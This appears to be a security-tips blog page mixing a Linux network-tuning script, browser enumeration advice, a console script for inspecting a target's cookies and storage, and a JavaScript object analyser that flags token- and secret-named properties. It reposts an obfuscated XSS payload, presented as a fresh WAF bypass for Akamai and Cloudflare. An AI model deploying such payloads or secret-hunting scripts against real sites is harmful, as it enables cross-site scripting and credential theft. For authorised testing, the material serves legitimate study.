Hackertips.today - Constantly learning and collaborating in an InfoSec world

# ------------------------------------------------------------------------------------------ Desc: TCPIP Tweaks for Ubuntu / most linux distress Note: This likely will improve your throughput.  I have had no problems with these settings  +    :  #------------------------------------------------------------------------------------------| # INTERFACE SETTINGS # ================== # Please understand these before changing them. # Check out Documentation/networking/ip-sysctl.txt in your kernel source for more details. #---[ FULL CREDIT IS GIVEN TO THE ORIGINAL POSTER ]---# |--------------------------------------------------------------------------------------| #load irc and ftp conntrack helpers if they exist /sbin/modprobe ip_conntrack_irc &>/dev/null /sbin/modprobe ip_conntrack_ftp &>/dev/null #ip fowarding (these must be 1 to be able to forward packets between interfaces!) echo 1 > /proc/sys/net/ipv4/ip_forward echo 1 > /proc/sys/net/ipv4/conf...

Just found this on LinkedIn - Props goes to Amit for the post AMIT BHAKAR AMIT BHAKAR   • 2nd Verified • 2nd Cyber Security Researcher || Bug Bounty Hunter || Penetration Tester || Ethical Hacker|| Cyber Security Researcher || Bug Bounty Hunter || Penetration Tester || Ethical Hacker|| 1d • 1 day ago • Visible to anyone on or off LinkedIn Pending You have already invited AMIT BHAKAR Bug Bounty tips 👀 New WAF Bypass Discovered - Akamai & Cloudflare 🔥 Original Post Link: https://www.linkedin.com/feed/update/urn:li:activity:7364263906405441537/ A fresh technique has been spotted that successfully bypasses WAFs like Akamai and Cloudflare. Payload -  <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address...

How to enumerate your web app (target) easily for certain keywords - Load target - any browser pretty much right click inspect Once opened goto Sources tab -> On the left make sure "Page" is selected (not content scripts) -> right click "top" (right under the page icon you picked) -> Type in API for instance and hit ENTER You should see output like you see in the picture below, the browser will search all relevant scripts and info in the source that matches and tell you where it matched those keywords. Hackertips today

Using https://archive.org (and https://archive.is) are great ways to enumerate your target hackertips.today

"Leet Browser Store Viewer" - next level elite I have been working on a script we can paste into Inspect / Console (on the target) which will bring up a menu on z-index: 9999 (so it wont affect or get in the way of the page) .. it will allow you to view the browser store, cookie store, doc properties and all sorts of other "hidden" info Once pasted in on the target you will see a menu like this: Collapse / Stealth Mode Log Document Log LocalStorage Log Cookies Log Navigator Log Window Log IndexedDB ( You can collapse it, or make it nearly impossible to see, but it is still there) All the output shows in console. You will love this. (I promise) Enjoy! Leet-Store-JS-code https://hackertips.today/cmd/leet-Store-Viewer.js Hackertips.Today

 // Usage examples: // analyzeObject(window.ga, { name: 'ga' }); // analyzeObject(appState, { name: 'appState', maxDepth: 3, tryPollute: true }); (function () { const SUSPICIOUS_NAME_RE = /(csrf|xsrf|token|auth|secret|session|jwt|apikey|api[-_]?key|bearer|cookie|hdr|header)/i; function analyzeObject(target, { name = '(anonymous)', maxDepth = 2, tryPollute = false, // off by default; if true, adds & removes a probe on the prototype showValues = false // keep false to avoid dumping sensitive values to the console } = {}) { if (target == null || (typeof target !== 'object' && typeof target !== 'function')) { console.warn(`[X] Target '${name}' is not an object/function or is null/undefined.`); return; } console.group(`[?] Analyzing '${name}'`); const ownProps = Object.getOwnPropertyNames(target); console.log(`[^] Own properties (${ownProps.length}):`, ownProps); // Classify const types = ownProps.reduce((ac...